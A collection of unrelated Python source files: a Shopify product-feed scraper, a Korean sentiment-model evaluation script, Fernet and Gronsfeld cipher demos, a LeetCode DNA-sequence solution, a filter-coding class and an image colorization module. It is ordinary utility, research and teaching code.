def downloadJson(self,pageNumber):
r= requests.get(self.baseurl + f'products.json?limit=250&page={pageNumber}',timeout=20)
if r.status_code !=200:
print('Error : ' , r.status_code)
if len(r.json()['products']) > 0:
data = r.json()['products']
return data
else:
return
def parsejson(self,jsondata):
productsArray=[]
for product in jsondata:
mainId= product['id']
mainTitle=product['title']
vendor= product['vendor']
product_type= product['product_type']
for variant in product['variants']:
item={
'id':mainId,
'product_type':product_type,
'mainTitle':mainTitle,
'vendor':vendor,
'variantId': variant['id'],
'vTitle': variant['title'],
'requires_shipping': variant['requires_shipping'],
'taxable': variant['taxable'],
'available': variant['available'],
'created_at': variant['created_at'],
'updated_at': variant['updated_at'],
'price': variant['price'],
'position': variant['position'],
}
productsArray.append(item)
return productsArray
def main():
all = ShopifyScraper('https://www.allbirds.co.uk/')
allPagePesults=[]
for page in range(1,10):
data = all.downloadJson(page)
print('Getting data from: ',page)
try:
allPagePesults.append(all.parsejson(data))
except:
print(f'completed , pages = {page -1}')
break
return allPagePesults
products=main()
totalProducts = [item for i in products for item in i]
print('Total Products',len(totalProducts))
# if __name__ == '__main__':
# # db = dataset.connect('location')
# # table = db.create_table('products',primary_id='variantId')
# # products=main()
# # totalProducts = [item for i in products for item in i]
# print('Total Products',len(totalProducts))
# # for p in totalProducts:
# # if not table.find_one(variantId=p['variantId']):
# # table.insert(p)
# # print('new product :' , p)
# print(data) |
import torch
import argparse
import os
import glob
from torch.utils.data import DataLoader, SequentialSampler
from tqdm import tqdm
from nsmc_modeling import RobertaForSequenceClassification
from bert.tokenizer import Tokenizer
from dataset import NSMCDataSet
def _get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--state_dict", type=str, required=True)
parser.add_argument("--bert_model", type=str, default='bert/')
parser.add_argument("--batch_size", type=int, default=32)
parser.add_argument("--max_seq_length", type=int, default=512)
parser.add_argument("--gpu_index", type=int, default=0)
parser.add_argument("--no_display", action="store_true")
return parser
if __name__ == "__main__":
args = _get_parser().parse_args()
tokenizer = Tokenizer(os.path.join(args.bert_model, "senti_vocab.txt"),
os.path.join(args.bert_model, "RoBERTa_Sentiment_kor"))
dataset = NSMCDataSet("test", tokenizer, max_seq_length=args.max_seq_length)
sampler = SequentialSampler(dataset)
dataloader = DataLoader(dataset,
batch_size=args.batch_size,
sampler=sampler,
collate_fn=dataset.collate_fn)
device = torch.device(type="cuda", index=args.gpu_index)
model = RobertaForSequenceClassification()
model_path = os.path.join('checkpoints/yaho/', '*.ckpt')
model_path_list = glob.glob(model_path)
for path in model_path_list:
model.load_state_dict(state_dict=torch.load(path, map_location=torch.device('cpu')), strict=False)
model.to(device)
model.eval()
match = 0
progress = 0
pbar = tqdm(dataloader, disable=args.no_display, desc="Eval")
for batch in pbar:
input_ids, attention_mask, labels = batch
inputs = {
"input_ids": torch.tensor(input_ids, dtype=torch.long).cuda(),
"attention_mask": torch.tensor(attention_mask, dtype=torch.long).cuda()
}
with torch.no_grad():
logits = model(**inputs)
labels = torch.tensor(labels, dtype=torch.float).cuda()
match_seq = (logits.view(-1) >= 0.0) == (labels.view(-1) == 1)
match += match_seq.sum().item()
progress += labels.size(0)
pbar.update()
pbar.set_postfix(
{"state_dict": path, "accuracy": f"{100.0 * match / progress:.2f}"}
)
pbar.close()
log_file = open('./output/10^5step_log.txt', 'a')
log_file.write("state_dict : " + path + "accuracy :" + str(100 * match / progress) + '\n')
log_file.close()
print({"state_dict": path, "accuracy": f"{100 * match / progress:.2f}"})
|
from cryptography.fernet import Fernet
from faker import Faker
key = Fernet.generate_key()
f = Fernet(key)
text = Faker().text()
print('Text to encrypt:', text, '\n')
token = f.encrypt(text.encode())
print('Encrypted text:', token, '\n')
decrypted = f.decrypt(token)
print('Decrypted text:', decrypted)
|
"""
Implements command line ``python -m td3a_cpp_deep <command> <args>``.
"""
import sys
def main(args, fLOG=print):
"""
Implements ``python -m td3a_check check <command> <args>``.
"""
from pyquickhelper.cli import cli_main_helper
try:
from . import check
except ImportError: # pragma: no cover
from td3a_cpp import check
fcts = dict(check=check)
return cli_main_helper(fcts, args=args, fLOG=fLOG)
if __name__ == "__main__":
main(sys.argv[1:])
|
class Solution(object):
def str2int(self,s):
res=0
for i in xrange(len(s)):
res=(res<<3)+(ord(s[i])&7)
return res
def findRepeatedDnaSequences(self, s):
"""
:type s: str
:rtype: List[str]
"""
mapping={'A':0,'C':1,'G':2,'T':3}
if len(s)<=10:
return []
hashmapping={}
res=[]
for i in xrange(len(s)-9):
v=0
for j in xrange(i,i+10):
v<<=2
v|=mapping[s[j]]
hashmapping[v]=hashmapping.get(v,0)+1
if hashmapping[v]==2:
res.append(s[i:i+10])
return res |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: Apache-2.0
# SPDX-FileCopyrightText: © 2021 Massachusetts Institute of Technology.
# SPDX-FileCopyrightText: © 2021 Lee McCuller <[email protected]>
# NOTICE: authors should document their contributions in concisely in NOTICE
# with details inline in source files, comments, and docstrings.
"""
"""
import numpy as np
from ..codings_cmn import (
CodingTypeZ,
Ipi,
)
class CodingnlFnlA(CodingTypeZ):
N_parameters = 2
unstable = False
p_nlF_Hz = 0
p_nl_A = 0
max_amplitude = 1
def update(self, nlF_Hz, nl_A):
self.p_nlF_Hz = nlF_Hz
self.p_nl_A = nl_A
def reduce(self):
return [
self.p_nlF_Hz,
self.p_nl_A,
]
def option_set(self, minimum_BW_Hz=None, **kwargs):
super(CodingnlFnlA, self).option_set(**kwargs)
if minimum_BW_Hz is not None:
self.max_amplitude = 1 - (minimum_BW_Hz / self.sys.F_nyquist_Hz)
# TODO, should modify p_nl_A for the new max_amplitude
return
def update_roots(self, r1):
""" """
# TODO should honor max_amplitude
amp = abs(r1)
F_Hz = np.angle(r1) / np.pi * self.sys.F_nyquist_Hz
relF_Hz = F_Hz / self.sys.F_cutoff_Hz
if relF_Hz >= 1:
relF_Hz = 0.999
elif relF_Hz <= -1:
relF_Hz = 0.001
self.p_nlF_Hz = relF_Hz / (1 - relF_Hz ** 2) ** 0.5
if amp < 1:
# amp = x / (1. + x**2)**.5
# amp**2 = x**2 / (1. + x**2)
# amp**2 (1. + x**2) = x**2
# amp**2 = x**2 ( 1 - amp**2)
# amp**2 / (1 - amp**2) = x**2
self.unstable = False
self.p_nl_A = amp / (1 - amp ** 2) ** 0.5
else:
# amp = (1. + x**2)**.5 / x
# amp**2 = (1. + x**2) / x**2
# amp**2 x**2 = x**2 + 1
# amp**2 = x**2 (amp**2 - 1)
# amp**2 / (amp**2 - 1) = x**2
self.unstable = True
amp = 1 / amp
self.p_nl_A = amp / (1 - amp ** 2) ** 0.5
return
@property
def gain_effect(self):
# always 1 since it is complex
if not self.unstable:
return 1
else:
return 1
@property
def relF_Hz(self):
val = self.p_nlF_Hz / (1.0 + self.p_nlF_Hz ** 2) ** 0.5
return val
@property
def amplitude(self):
if not self.unstable:
amp = self.max_amplitude * self.p_nl_A / (1.0 + self.p_nl_A ** 2) ** 0.5
else:
amp = (1.0 + self.p_nl_A ** 2) ** 0.5 / self.p_nl_A / self.max_amplitude
return amp
def transfer(self):
# frequency, logarithmic amplitude
amp = self.amplitude
r = amp * np.cos(
np.pi * self.sys.F_cutoff_Hz * self.relF_Hz / self.sys.F_nyquist_Hz
)
Xn = self.sys.Xzn_grid
Xnsq = self.sys.Xzn_grid_sq
return (amp * amp) * Xnsq - 2 * Xn * r + 1
def derivative(self):
if self.disable:
return []
# real/imaginary part of root
if not self.unstable:
sqp5 = (1.0 + self.p_nl_A ** 2) ** 0.5
amp = self.max_amplitude * self.p_nl_A / sqp5
DampDl = self.max_amplitude * (
1 / sqp5 - self.p_nl_A ** 2 / (1.0 + self.p_nl_A ** 2) ** 1.5
)
else:
sqp5 = (1.0 + self.p_nl_A ** 2) ** 0.5
amp = sqp5 / self.p_nl_A / self.max_amplitude
DampDl = (1 / sqp5 - sqp5 / self.p_nl_A ** 2) / self.max_amplitude
Fsqp5 = (1.0 + self.p_nlF_Hz ** 2) ** 0.5
relF_Hz = self.p_nlF_Hz / Fsqp5
DrelFHzDp = 1 / Fsqp5 - self.p_nlF_Hz ** 2 / (1.0 + self.p_nlF_Hz ** 2) ** 1.5
F_nyquist_Hz = self.sys.F_nyquist_Hz
Xn = self.sys.Xzn_grid
Xnsq = self.sys.Xzn_grid_sq
rcos = np.cos(np.pi * self.sys.F_cutoff_Hz * relF_Hz / F_nyquist_Hz)
rsin = np.sin(np.pi * self.sys.F_cutoff_Hz * relF_Hz / F_nyquist_Hz)
return [
DrelFHzDp
* (2 * amp * np.pi * self.sys.F_cutoff_Hz / self.sys.F_nyquist_Hz)
* (Xn * rsin),
((2 * amp * DampDl) * Xnsq - Xn * (2 * rcos * DampDl)),
]
def roots_c(self):
# real/imaginary part of root
return [
self.amplitude
* np.exp(
Ipi * abs(self.relF_Hz) * self.sys.F_cutoff_Hz / self.sys.F_nyquist_Hz
)
]
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
from skimage import color
from sklearn.cluster import KMeans
import os
from scipy.ndimage.interpolation import zoom
def create_temp_directory(path_template, N=1e8):
print(path_template)
cur_path = path_template % np.random.randint(0, N)
while(os.path.exists(cur_path)):
cur_path = path_template % np.random.randint(0, N)
print('Creating directory: %s' % cur_path)
os.mkdir(cur_path)
return cur_path
def lab2rgb_transpose(img_l, img_ab):
''' INPUTS
img_l 1xXxX [0,100]
img_ab 2xXxX [-100,100]
OUTPUTS
returned value is XxXx3 '''
pred_lab = np.concatenate((img_l, img_ab), axis=0).transpose((1, 2, 0))
pred_rgb = (np.clip(color.lab2rgb(pred_lab), 0, 1) * 255).astype('uint8')
return pred_rgb
def rgb2lab_transpose(img_rgb):
''' INPUTS
img_rgb XxXx3
OUTPUTS
returned value is 3xXxX '''
return color.rgb2lab(img_rgb).transpose((2, 0, 1))
class ColorizeImageBase():
def __init__(self, Xd=256, Xfullres_max=10000):
self.Xd = Xd
self.img_l_set = False
self.net_set = False
self.Xfullres_max = Xfullres_max # maximum size of maximum dimension
self.img_just_set = False # this will be true whenever image is just loaded
# net_forward can set this to False if they want
def prep_net(self):
raise Exception("Should be implemented by base class")
# ***** Image prepping *****
def load_image(self, input_path):
# rgb image [CxXdxXd]
im = cv2.cvtColor(cv2.imread(input_path, 1), cv2.COLOR_BGR2RGB)
self.img_rgb_fullres = im.copy()
self._set_img_lab_fullres_()
im = cv2.resize(im, (self.Xd, self.Xd))
self.img_rgb = im.copy()
# self.img_rgb = sp.misc.imresize(plt.imread(input_path),(self.Xd,self.Xd)).transpose((2,0,1))
self.img_l_set = True
# convert into lab space
self._set_img_lab_()
self._set_img_lab_mc_()
def set_image(self, input_image):
self.img_rgb_fullres = input_image.copy()
self._set_img_lab_fullres_()
self.img_l_set = True
self.img_rgb = input_image
# convert into lab space
self._set_img_lab_()
self._set_img_lab_mc_()
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
if(not self.img_l_set):
print('I need to have an image!')
return -1
if(not self.net_set):
print('I need to have a net!')
return -1
self.input_ab = input_ab
self.input_ab_mc = (input_ab - self.ab_mean) / self.ab_norm
self.input_mask = input_mask
self.input_mask_mult = input_mask * self.mask_mult
return 0
def get_result_PSNR(self, result=-1, return_SE_map=False):
if np.array((result)).flatten()[0] == -1:
cur_result = self.get_img_forward()
else:
cur_result = result.copy()
SE_map = (1. * self.img_rgb - cur_result)**2
cur_MSE = np.mean(SE_map)
cur_PSNR = 20 * np.log10(255. / np.sqrt(cur_MSE))
if return_SE_map:
return(cur_PSNR, SE_map)
else:
return cur_PSNR
def get_img_forward(self):
# get image with point estimate
return self.output_rgb
def get_img_gray(self):
# Get black and white image
return lab2rgb_transpose(self.img_l, np.zeros((2, self.Xd, self.Xd)))
def get_img_gray_fullres(self):
# Get black and white image
return lab2rgb_transpose(self.img_l_fullres, np.zeros((2, self.img_l_fullres.shape[1], self.img_l_fullres.shape[2])))
def get_img_fullres(self):
# This assumes self.img_l_fullres, self.output_ab are set.
# Typically, this means that set_image() and net_forward()
# have been called.
# bilinear upsample
zoom_factor = (1, 1. * self.img_l_fullres.shape[1] / self.output_ab.shape[1], 1. * self.img_l_fullres.shape[2] / self.output_ab.shape[2])
output_ab_fullres = zoom(self.output_ab, zoom_factor, order=1)
return lab2rgb_transpose(self.img_l_fullres, output_ab_fullres)
def get_input_img_fullres(self):
zoom_factor = (1, 1. * self.img_l_fullres.shape[1] / self.input_ab.shape[1], 1. * self.img_l_fullres.shape[2] / self.input_ab.shape[2])
input_ab_fullres = zoom(self.input_ab, zoom_factor, order=1)
return lab2rgb_transpose(self.img_l_fullres, input_ab_fullres)
def get_input_img(self):
return lab2rgb_transpose(self.img_l, self.input_ab)
def get_img_mask(self):
# Get black and white image
return lab2rgb_transpose(100. * (1 - self.input_mask), np.zeros((2, self.Xd, self.Xd)))
def get_img_mask_fullres(self):
# Get black and white image
zoom_factor = (1, 1. * self.img_l_fullres.shape[1] / self.input_ab.shape[1], 1. * self.img_l_fullres.shape[2] / self.input_ab.shape[2])
input_mask_fullres = zoom(self.input_mask, zoom_factor, order=0)
return lab2rgb_transpose(100. * (1 - input_mask_fullres), np.zeros((2, input_mask_fullres.shape[1], input_mask_fullres.shape[2])))
def get_sup_img(self):
return lab2rgb_transpose(50 * self.input_mask, self.input_ab)
def get_sup_fullres(self):
zoom_factor = (1, 1. * self.img_l_fullres.shape[1] / self.output_ab.shape[1], 1. * self.img_l_fullres.shape[2] / self.output_ab.shape[2])
input_mask_fullres = zoom(self.input_mask, zoom_factor, order=0)
input_ab_fullres = zoom(self.input_ab, zoom_factor, order=0)
return lab2rgb_transpose(50 * input_mask_fullres, input_ab_fullres)
# ***** Private functions *****
def _set_img_lab_fullres_(self):
# adjust full resolution image to be within maximum dimension is within Xfullres_max
Xfullres = self.img_rgb_fullres.shape[0]
Yfullres = self.img_rgb_fullres.shape[1]
if Xfullres > self.Xfullres_max or Yfullres > self.Xfullres_max:
if Xfullres > Yfullres:
zoom_factor = 1. * self.Xfullres_max / Xfullres
else:
zoom_factor = 1. * self.Xfullres_max / Yfullres
self.img_rgb_fullres = zoom(self.img_rgb_fullres, (zoom_factor, zoom_factor, 1), order=1)
self.img_lab_fullres = color.rgb2lab(self.img_rgb_fullres).transpose((2, 0, 1))
self.img_l_fullres = self.img_lab_fullres[[0], :, :]
self.img_ab_fullres = self.img_lab_fullres[1:, :, :]
def _set_img_lab_(self):
# set self.img_lab from self.im_rgb
self.img_lab = color.rgb2lab(self.img_rgb).transpose((2, 0, 1))
self.img_l = self.img_lab[[0], :, :]
self.img_ab = self.img_lab[1:, :, :]
def _set_img_lab_mc_(self):
# set self.img_lab_mc from self.img_lab
# lab image, mean centered [XxYxX]
self.img_lab_mc = self.img_lab / np.array((self.l_norm, self.ab_norm, self.ab_norm))[:, np.newaxis, np.newaxis] - np.array(
(self.l_mean / self.l_norm, self.ab_mean / self.ab_norm, self.ab_mean / self.ab_norm))[:, np.newaxis, np.newaxis]
self._set_img_l_()
def _set_img_l_(self):
self.img_l_mc = self.img_lab_mc[[0], :, :]
self.img_l_set = True
def _set_img_ab_(self):
self.img_ab_mc = self.img_lab_mc[[1, 2], :, :]
def _set_out_ab_(self):
self.output_lab = rgb2lab_transpose(self.output_rgb)
self.output_ab = self.output_lab[1:, :, :]
class ColorizeImageTorch(ColorizeImageBase):
def __init__(self, Xd=256):
print('ColorizeImageTorch instantiated')
ColorizeImageBase.__init__(self, Xd)
self.l_norm = 1.
self.ab_norm = 1.
self.l_mean = 50.
self.ab_mean = 0.
self.mask_mult = 1.
# Load grid properties
self.pts_in_hull = np.array(np.meshgrid(np.arange(-110, 120, 10), np.arange(-110, 120, 10))).reshape((2, 529)).T
# ***** Net preparation *****
def prep_net(self, gpu_id=None, path='', dist=False):
import torch
import models.pytorch.model as model
print('path = %s' % path)
print('Model set! dist mode? ', dist)
self.net = model.SIGGRAPHGenerator(dist=dist)
state_dict = torch.load(path)
if hasattr(state_dict, '_metadata'):
del state_dict._metadata
# patch InstanceNorm checkpoints prior to 0.4
for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop
self.__patch_instance_norm_state_dict(state_dict, self.net, key.split('.'))
self.net.load_state_dict(state_dict)
if gpu_id != -1:
self.net.cuda()
self.net.eval()
self.net_set = True
def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):
key = keys[i]
if i + 1 == len(keys): # at the end, pointing to a parameter/buffer
if module.__class__.__name__.startswith('InstanceNorm') and \
(key == 'running_mean' or key == 'running_var'):
if getattr(module, key) is None:
state_dict.pop('.'.join(keys))
if module.__class__.__name__.startswith('InstanceNorm') and \
(key == 'num_batches_tracked'):
state_dict.pop('.'.join(keys))
else:
self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)
# ***** Call forward *****
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
if ColorizeImageBase.net_forward(self, input_ab, input_mask) == -1:
return -1
# net_input_prepped = np.concatenate((self.img_l_mc, self.input_ab_mc, self.input_mask_mult), axis=0)
# return prediction
# self.net.blobs['data_l_ab_mask'].data[...] = net_input_prepped
# embed()
output_ab = self.net.forward(self.img_l_mc, self.input_ab_mc, self.input_mask_mult)[0, :, :, :].cpu().data.numpy()
self.output_rgb = lab2rgb_transpose(self.img_l, output_ab)
# self.output_rgb = lab2rgb_transpose(self.img_l, self.net.blobs[self.pred_ab_layer].data[0, :, :, :])
self._set_out_ab_()
return self.output_rgb
def get_img_forward(self):
# get image with point estimate
return self.output_rgb
def get_img_gray(self):
# Get black and white image
return lab2rgb_transpose(self.img_l, np.zeros((2, self.Xd, self.Xd)))
class ColorizeImageTorchDist(ColorizeImageTorch):
def __init__(self, Xd=256):
ColorizeImageTorch.__init__(self, Xd)
self.dist_ab_set = False
self.pts_grid = np.array(np.meshgrid(np.arange(-110, 120, 10), np.arange(-110, 120, 10))).reshape((2, 529)).T
self.in_hull = np.ones(529, dtype=bool)
self.AB = self.pts_grid.shape[0] # 529
self.A = int(np.sqrt(self.AB)) # 23
self.B = int(np.sqrt(self.AB)) # 23
self.dist_ab_full = np.zeros((self.AB, self.Xd, self.Xd))
self.dist_ab_grid = np.zeros((self.A, self.B, self.Xd, self.Xd))
self.dist_entropy = np.zeros((self.Xd, self.Xd))
def prep_net(self, gpu_id=None, path='', dist=True, S=.2):
ColorizeImageTorch.prep_net(self, gpu_id=gpu_id, path=path, dist=dist)
# set S somehow
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
# embed()
if ColorizeImageBase.net_forward(self, input_ab, input_mask) == -1:
return -1
# set distribution
(function_return, self.dist_ab) = self.net.forward(self.img_l_mc, self.input_ab_mc, self.input_mask_mult)
function_return = function_return[0, :, :, :].cpu().data.numpy()
self.dist_ab = self.dist_ab[0, :, :, :].cpu().data.numpy()
self.dist_ab_set = True
# full grid, ABxXxX, AB = 529
self.dist_ab_full[self.in_hull, :, :] = self.dist_ab
# gridded, AxBxXxX, A = 23
self.dist_ab_grid = self.dist_ab_full.reshape((self.A, self.B, self.Xd, self.Xd))
# return
return function_return
def get_ab_reccs(self, h, w, K=5, N=25000, return_conf=False):
''' Recommended colors at point (h,w)
Call this after calling net_forward
'''
if not self.dist_ab_set:
print('Need to set prediction first')
return 0
# randomly sample from pdf
cmf = np.cumsum(self.dist_ab[:, h, w]) # CMF
cmf = cmf / cmf[-1]
cmf_bins = cmf
# randomly sample N points
rnd_pts = np.random.uniform(low=0, high=1.0, size=N)
inds = np.digitize(rnd_pts, bins=cmf_bins)
rnd_pts_ab = self.pts_in_hull[inds, :]
# run k-means
kmeans = KMeans(n_clusters=K).fit(rnd_pts_ab)
# sort by cluster occupancy
k_label_cnt = np.histogram(kmeans.labels_, np.arange(0, K + 1))[0]
k_inds = np.argsort(k_label_cnt, axis=0)[::-1]
cluster_per = 1. * k_label_cnt[k_inds] / N # percentage of points within cluster
cluster_centers = kmeans.cluster_centers_[k_inds, :] # cluster centers
# cluster_centers = np.random.uniform(low=-100,high=100,size=(N,2))
if return_conf:
return cluster_centers, cluster_per
else:
return cluster_centers
def compute_entropy(self):
# compute the distribution entropy (really slow right now)
self.dist_entropy = np.sum(self.dist_ab * np.log(self.dist_ab), axis=0)
def plot_dist_grid(self, h, w):
# Plots distribution at a given point
plt.figure()
plt.imshow(self.dist_ab_grid[:, :, h, w], extent=[-110, 110, 110, -110], interpolation='nearest')
plt.colorbar()
plt.ylabel('a')
plt.xlabel('b')
def plot_dist_entropy(self):
# Plots distribution at a given point
plt.figure()
plt.imshow(-self.dist_entropy, interpolation='nearest')
plt.colorbar()
class ColorizeImageCaffe(ColorizeImageBase):
def __init__(self, Xd=256):
print('ColorizeImageCaffe instantiated')
ColorizeImageBase.__init__(self, Xd)
self.l_norm = 1.
self.ab_norm = 1.
self.l_mean = 50.
self.ab_mean = 0.
self.mask_mult = 110.
self.pred_ab_layer = 'pred_ab' # predicted ab layer
# Load grid properties
self.pts_in_hull_path = './data/color_bins/pts_in_hull.npy'
self.pts_in_hull = np.load(self.pts_in_hull_path) # 313x2, in-gamut
# ***** Net preparation *****
def prep_net(self, gpu_id, prototxt_path='', caffemodel_path=''):
import caffe
print('gpu_id = %d, net_path = %s, model_path = %s' % (gpu_id, prototxt_path, caffemodel_path))
if gpu_id == -1:
caffe.set_mode_cpu()
else:
caffe.set_device(gpu_id)
caffe.set_mode_gpu()
self.gpu_id = gpu_id
self.net = caffe.Net(prototxt_path, caffemodel_path, caffe.TEST)
self.net_set = True
# automatically set cluster centers
if len(self.net.params[self.pred_ab_layer][0].data[...].shape) == 4 and self.net.params[self.pred_ab_layer][0].data[...].shape[1] == 313:
print('Setting ab cluster centers in layer: %s' % self.pred_ab_layer)
self.net.params[self.pred_ab_layer][0].data[:, :, 0, 0] = self.pts_in_hull.T
# automatically set upsampling kernel
for layer in self.net._layer_names:
if layer[-3:] == '_us':
print('Setting upsampling layer kernel: %s' % layer)
self.net.params[layer][0].data[:, 0, :, :] = np.array(((.25, .5, .25, 0), (.5, 1., .5, 0), (.25, .5, .25, 0), (0, 0, 0, 0)))[np.newaxis, :, :]
# ***** Call forward *****
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
if ColorizeImageBase.net_forward(self, input_ab, input_mask) == -1:
return -1
net_input_prepped = np.concatenate((self.img_l_mc, self.input_ab_mc, self.input_mask_mult), axis=0)
self.net.blobs['data_l_ab_mask'].data[...] = net_input_prepped
self.net.forward()
# return prediction
self.output_rgb = lab2rgb_transpose(self.img_l, self.net.blobs[self.pred_ab_layer].data[0, :, :, :])
self._set_out_ab_()
return self.output_rgb
def get_img_forward(self):
# get image with point estimate
return self.output_rgb
def get_img_gray(self):
# Get black and white image
return lab2rgb_transpose(self.img_l, np.zeros((2, self.Xd, self.Xd)))
class ColorizeImageCaffeGlobDist(ColorizeImageCaffe):
# Caffe colorization, with additional global histogram as input
def __init__(self, Xd=256):
ColorizeImageCaffe.__init__(self, Xd)
self.glob_mask_mult = 1.
self.glob_layer = 'glob_ab_313_mask'
def net_forward(self, input_ab, input_mask, glob_dist=-1):
# glob_dist is 313 array, or -1
if np.array(glob_dist).flatten()[0] == -1: # run without this, zero it out
self.net.blobs[self.glob_layer].data[0, :-1, 0, 0] = 0.
self.net.blobs[self.glob_layer].data[0, -1, 0, 0] = 0.
else: # run conditioned on global histogram
self.net.blobs[self.glob_layer].data[0, :-1, 0, 0] = glob_dist
self.net.blobs[self.glob_layer].data[0, -1, 0, 0] = self.glob_mask_mult
self.output_rgb = ColorizeImageCaffe.net_forward(self, input_ab, input_mask)
self._set_out_ab_()
return self.output_rgb
class ColorizeImageCaffeDist(ColorizeImageCaffe):
# caffe model which includes distribution prediction
def __init__(self, Xd=256):
ColorizeImageCaffe.__init__(self, Xd)
self.dist_ab_set = False
self.scale_S_layer = 'scale_S'
self.dist_ab_S_layer = 'dist_ab_S' # softened distribution layer
self.pts_grid = np.load('./data/color_bins/pts_grid.npy') # 529x2, all points
self.in_hull = np.load('./data/color_bins/in_hull.npy') # 529 bool
self.AB = self.pts_grid.shape[0] # 529
self.A = int(np.sqrt(self.AB)) # 23
self.B = int(np.sqrt(self.AB)) # 23
self.dist_ab_full = np.zeros((self.AB, self.Xd, self.Xd))
self.dist_ab_grid = np.zeros((self.A, self.B, self.Xd, self.Xd))
self.dist_entropy = np.zeros((self.Xd, self.Xd))
def prep_net(self, gpu_id, prototxt_path='', caffemodel_path='', S=.2):
ColorizeImageCaffe.prep_net(self, gpu_id, prototxt_path=prototxt_path, caffemodel_path=caffemodel_path)
self.S = S
self.net.params[self.scale_S_layer][0].data[...] = S
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
function_return = ColorizeImageCaffe.net_forward(self, input_ab, input_mask)
if np.array(function_return).flatten()[0] == -1: # errored out
return -1
# set distribution
# in-gamut, CxXxX, C = 313
self.dist_ab = self.net.blobs[self.dist_ab_S_layer].data[0, :, :, :]
self.dist_ab_set = True
# full grid, ABxXxX, AB = 529
self.dist_ab_full[self.in_hull, :, :] = self.dist_ab
# gridded, AxBxXxX, A = 23
self.dist_ab_grid = self.dist_ab_full.reshape((self.A, self.B, self.Xd, self.Xd))
# return
return function_return
def get_ab_reccs(self, h, w, K=5, N=25000, return_conf=False):
''' Recommended colors at point (h,w)
Call this after calling net_forward
'''
if not self.dist_ab_set:
print('Need to set prediction first')
return 0
# randomly sample from pdf
cmf = np.cumsum(self.dist_ab[:, h, w]) # CMF
cmf = cmf / cmf[-1]
cmf_bins = cmf
# randomly sample N points
rnd_pts = np.random.uniform(low=0, high=1.0, size=N)
inds = np.digitize(rnd_pts, bins=cmf_bins)
rnd_pts_ab = self.pts_in_hull[inds, :]
# run k-means
kmeans = KMeans(n_clusters=K).fit(rnd_pts_ab)
# sort by cluster occupancy
k_label_cnt = np.histogram(kmeans.labels_, np.arange(0, K + 1))[0]
k_inds = np.argsort(k_label_cnt, axis=0)[::-1]
cluster_per = 1. * k_label_cnt[k_inds] / N # percentage of points within cluster
cluster_centers = kmeans.cluster_centers_[k_inds, :] # cluster centers
# cluster_centers = np.random.uniform(low=-100,high=100,size=(N,2))
if return_conf:
return cluster_centers, cluster_per
else:
return cluster_centers
def compute_entropy(self):
# compute the distribution entropy (really slow right now)
self.dist_entropy = np.sum(self.dist_ab * np.log(self.dist_ab), axis=0)
def plot_dist_grid(self, h, w):
# Plots distribution at a given point
plt.figure()
plt.imshow(self.dist_ab_grid[:, :, h, w], extent=[-110, 110, 110, -110], interpolation='nearest')
plt.colorbar()
plt.ylabel('a')
plt.xlabel('b')
def plot_dist_entropy(self):
# Plots distribution at a given point
plt.figure()
plt.imshow(-self.dist_entropy, interpolation='nearest')
plt.colorbar()
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
from secretpy import Gronsfeld, CryptMachine, alphabets as al
from secretpy.cmdecorators import UpperCase, Block, SaveAll
alphabet = al.GERMAN
plaintext = u"schweißgequältvomödentextzürnttypografjakob"
key = (4, 17, 9)
cipher = Gronsfeld()
print(plaintext)
enc = cipher.encrypt(plaintext, key, alphabet)
print(enc)
dec = cipher.decrypt(enc, key, alphabet)
print(dec)
#######################################################
def encdec(machine, plaintext):
print("--------------------------------------------------------------------")
print(plaintext)
enc = machine.encrypt(plaintext)
print(enc)
print(machine.decrypt(enc))
key = (14, 2, 11)
cm0 = CryptMachine(cipher, key)
cm = cm0
cm.set_alphabet(al.ENGLISH)
plaintext = "I don't love non-alphabet characters. I will remove all of them: ^,&@$~(*;?&#. Great!"
encdec(cm, plaintext)
cm = Block(cm, length=5, sep=" ")
cm.set_key((1, 12, 7, 2))
plaintext = "This text is divided by blocks of length 5!"
encdec(cm, plaintext)
cm = SaveAll(cm0)
plaintext = "I love non-alphabet characters. These are : ^,&@$~(*;?&#. That's it!"
encdec(cm, plaintext)
cm.set_alphabet(al.ENGLISH_SQUARE_IJ)
plaintext = "Jj becomes Ii because we use ENGLISH_SQUARE_IJ!"
encdec(cm, plaintext)
cm.set_alphabet(al.JAPANESE_HIRAGANA)
plaintext = u"text いろはにほへと ちりぬるを わかよたれそ つねならむ うゐのおくやま けふこえて あさきゆめみし ゑひもせす !"
encdec(cm, plaintext)
cm = UpperCase(cm)
alphabet = al.GREEK
cm.set_alphabet(alphabet)
plaintext = u"Θέλει αρετή και τόλμη η ελευθερία. (Ανδρέας Κάλβος)"
encdec(cm, plaintext)
'''
schweißgequältvomödentextzürnttypografjakob
wtqävrdxnuhfpgasßghvwxvcxmhvaüxlysxäewseöxf
schweißgequältvomödentextzürnttypografjakob
--------------------------------------------------------------------
I don't love non-alphabet characters. I will remove all of them: ^,&@$~(*;?&#. Great!
wfzbvwcxpbqyonavcmsvnvccoeestdwytzncsozjglznztvssorfglh
idontlovenonalphabetcharactersiwillremoveallofthemgreat
--------------------------------------------------------------------
This text is divided by blocks of length 5!
utpuu qevje kkwuk genfd majmt amnfz nvi
thistextisdividedbyblocksoflength
--------------------------------------------------------------------
I love non-alphabet characters. These are : ^,&@$~(*;?&#. That's it!
J xvxf zvp-bxwjbnlv dthtboagse. Ajfel csq : ^,&@$~(*;?&#. Ajbf'z ku!
I love non-alphabet characters. These are : ^,&@$~(*;?&#. That's it!
